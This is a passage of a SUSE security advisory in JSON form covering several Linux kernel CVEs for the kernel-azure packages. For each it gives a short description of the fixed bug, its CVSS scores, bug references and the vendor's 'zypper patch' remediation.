"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
